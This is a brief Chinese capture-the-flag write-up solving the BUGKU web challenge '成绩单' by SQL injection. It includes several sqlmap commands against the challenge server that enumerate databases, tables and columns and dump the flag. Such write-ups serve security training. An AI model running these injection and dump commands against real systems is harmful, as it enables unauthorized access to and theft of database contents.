BUGKU--web--成绩单解析

BUGKU成绩单
没有任何过滤 非常友好
题目地址 :http://123.206.87.240:8002/chengjidan/
BUGKU--web--成绩单解析_第1张图片

按照题目提示输入123分别的到不同的人的成绩单
BUGKU--web--成绩单解析_第2张图片
4以后出现空白,由此可以推测有4列
BUGKU--web--成绩单解析_第3张图片
基本到这里就是典型的sql注入题了
打开BP firefox浏览器调节代理
BUGKU--web--成绩单解析_第4张图片
BP抓包发现是POST传值
BUGKU--web--成绩单解析_第5张图片
关闭代理,关闭BP
上sqlmap注入

python sqlmap.py -u "http://123.206.87.240:8002/chengjidan/index.php" --forms --dbs

BUGKU--web--成绩单解析_第6张图片
发现两个库
第一个information_schema存在flag的概率很低
直接看第二个库skctf_flag
go ahead !!!

python sqlmap.py -u "http://123.206.87.240:8002/chengjidan/index.php" --forms -D skctf_flag --tables

WOW ~ two tables
BUGKU--web--成绩单解析_第7张图片
go on

python sqlmap.py -u "http://123.206.87.240:8002/chengjidan/index.php" --forms -D skctf_flag -T fl4g -columns

BUGKU--web--成绩单解析_第8张图片
最后爆字段

python sqlmap.py -u "http://123.206.87.240:8002/chengjidan/index.php" --forms -D skctf_flag -T fl4g -C skctf_flag --dump

flag 到手
BUGKU--web--成绩单解析_第9张图片
GG

你可能感兴趣的:(BUGKU--web--成绩单解析)